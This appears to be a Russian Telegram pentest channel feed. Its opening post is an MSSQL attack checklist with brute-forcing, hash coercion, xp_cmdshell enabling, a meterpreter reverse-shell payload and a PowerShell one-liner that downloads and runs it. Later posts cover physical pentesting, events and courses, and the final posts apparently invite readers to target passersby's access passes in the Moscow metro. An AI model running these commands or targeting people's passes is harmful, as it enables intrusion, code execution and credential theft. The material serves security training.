PRO:PENTEST
9K subscribers
118 photos
16 videos
13 files
215 links
Всё про ИБ и этичный хакинг.

Приватная группа: https://t.iss.one/+0H-FyThRQl1lMzVi
Чат: https://t.iss.one/pro_pentest_chat

Автор: @r00t_owl
По вопросам рекламы, коллабам, выступлениям: @marta_irinos
Download Telegram
Media is too big
VIEW IN TELEGRAM
В этом уроке мы рассмотрим пентест Microsoft SQL Server.
Чек-лист к данному занятию:


nmap --script ms-sql-info,ms-sql-ntlm-info -sT -sV -p 445,1433 192.168.1.3

crackmapexec mssql <IP> -d <Имя домена> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host>
msf> use auxiliary/scanner/mssql/mssql_login


mssqlclient.py -windows-auth [email protected]
sql> select IS_SRVROLEMEMBER ('sysadmin');
sql> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
msf> use auxiliary/admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_sql_logins

responder -I eth0 -v
sql> use master; exec xp_dirtree '\\<KALI_IP>\share';--
john --wordlist=/usr/share/wordlists/rockyou.txt mssql-svc.hash

sql> SELECT CONVERT(INT, ISNULL(value, value_in_use)) AS config_value FROM sys.configurations WHERE name = 'xp_cmdshell';
sql> EXEC sp_configure 'show advanced options',1;
sql> RECONFIGURE;
sql> EXEC sp_configure 'xp_cmdshell',1;
sql> RECONFIGURE;
sql> xp_cmdshell "echo (Get-Service windefend).Status | powershell"
sql> xp_cmdshell "echo Get-MpComputerStatus | powershell -noprofile"
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 VERBOSE=true -f psh -o meterpreter.ps1
sql> EXEC xp_cmdshell 'powershell.exe -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString(''[https://192.168.1.5:80/meterpreter.ps1](https://192.168.1.5/meterpreter.ps1)'')"'
msf> use exploit/windows/mssql/mssql_payload
msf> set payload windows/x64/meterpreter/reverse_tcp

msf> use exploit/windows/mssql/mssql_linkcrawler 
msf> use admin/mssql/mssql_escalate_execute_as
msf> use admin/mssql/mssql_escalate_dbowner
msf> use windows/manage/mssql_local_auth_bypass


#обучение
#AD
#pentest
#mssql
#xp_dirtree
#xp_cmdshell
#coercing
1🔥19👍8🤮1🤝1
Всем привет👋
Давно не писал про проекты, наконец-то руки дотянулись😄
Итак, энергетическая компания, физика + внутряк.
Приятного прочтения🔥

https://teletype.in/@r00t_owl/T3LxWSSywXO
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥24👍72🤮1
Forwarded from Cyber Media
🗣 Егор Зайцев, Информзащита: Юридическая подкованность – главный навык для физического пентеста

«Миссия невыполнима», «Бондиана» и другие шедевры шпионского кинематографа могут показаться скукотой по сравнению с буднями специалиста по проведению физических пентестов.

Егор Зайцев, директор департамента противодействия киберугрозам компании Информзащита, автор блога PRO:PENTEST рассказал порталу Cyber Media, что должен уметь специалист по физическому пентесту, какие способы проникновения есть в арсенале атакующих, и как от них защититься.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥32👍41🤮1🤝1
Всем привет!
Недавно прошли в компании обучение по внутреннему пентесту.
Курс был составлен под наши требования, краткий перечень тем которые затронули: Kerberos, NTLM-relay, ADCS, DACL Abuse, Bloodhound, Lateral Movement и т.д. - знакомые темы? Я думаю достаточно знакомые. Наш преподаватель показал базовые вещи, но с нетривиальным подходом, который помог в проектировании своего тулкита. Наши занятия были по 5 часов через день (супер интенсивно), где каждый проговаривал теоретическую основу, связывал ее с практикой и самостоятельно выполнял. Если что-то не получалось мы начинали дебажить, помогать друг другу и приходили к положительному результату. Из ценного выделить смогу разбор проектных ситуаций, когда мы попадаем в различные ограничения и нам необходимо самостоятельно решить проблему. Было много практики, где мы хорошо повеселились.
Обучение проходили 90% - веберы и 10% внутрянщики. И те и те остались довольны.
Если хотите поднять скилы вашей команды по внутряку пишите в личку @dmitt22
🔥20👍1🤮1🤝1
Как хакеры проникают на защищаемые объекты?
Всем Q, недавно, совместно с @fck_harder, замутили небольшое интервью по прошедшему сольному проекту по физике:

Ссылка!

В прод попала чистейшая выжимка, так что, если такого рода контент залетит, будем дальше пилить и расширять подобный формат.

Интересных проектов много, так что рассказать точно будет о чем 😈
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥12🤝2🤮1
Yandex, спасибо за приглашение на это мероприятие 🔥
Надеюсь доклады будут интересные 🦉
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍3🤮2🥴2🤝2
На прошедшем мероприятии от Yandex было много полезной информации в контексте построения процессов SOC. 🤔Представители менеджмента различных крупных компаний презентовали свои подходы и ответили на интересные вопросы. Было интересно пообщаться вживую со своим подписчиком🫡, обменялись мыслями по поводу концепций проектной деятельности. Встретил своего бывшего коллегу👋, он с удовольствием рассказал, какие на его взгляд процессы в моем департаменте необходимо улучшить, а на какие процессы повлиять практически невозможно ввиду специфического подхода высшего менеджмента, начиная с точки захвата лида до точки закрытия актов в рабочих проектах. В общем, было круто в плане обмена полезной информацией с коллегами, вкусных блюд на фуршете и прекрасного панорамного вида на город🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍3🥴2🤝1
С Июля появятся уголовные санкции за нарушение требований к антитеррористической защищенности объектов🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
👍63🔥2🥴1
This media is not supported in your browser
VIEW IN TELEGRAM
CyberED, большое спасибо за приглашение на выпускной!
Было приятно встретиться с моими студентами и не только🔥
Желаю нашей школе дальнейшего развития, пусть она так и остается проводником в наше небольшое ИБ комьюнити для новых специалистов🥳
Спасибо всем за встречу❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥19👍9🤝2
Forwarded from Cyber Media
🗣 Маргарита Трещилова, CyberEd: Безопасная разработка становится все более востребованным направлением обучения

🟢Можно ли стать хакером после сорока?
🟢Или выйти из декрета ведущим специалистом по кибербезопасности, если до этого никогда не работала в ИБ?
🟢А «перекатиться» в пентест из профессионального спорта?

➡️ Маргарита Трещилова, руководитель департамента организации образовательных программ в CyberEd, рассказала порталу Cyber Media о специфике обучения будущих специалистов по анализу кибербезопасности и анализу защищенности, преимуществах и недостатках разных образовательных программ для этичных хакеров, а также поделилась интересными историями успеха студентов.
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍10🔥6🤝2
Поехали 😛
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17❤‍🔥1
1❤‍🔥11👍1
Одна из целей по этой геопозиции🙃
1🤯3🤝21
Одна из целей через 5 минут будет проезжать станцию Павелецкая середина вагона
1👍61❤‍🔥1
Центр зала Автозаводской
1👍13🔥1🤯1
Если несколько человек стоит рядом, а ваша цель с пропуском уязвима, можете действовать смело, мы наблюдатели :)
1🔥121❤‍🔥1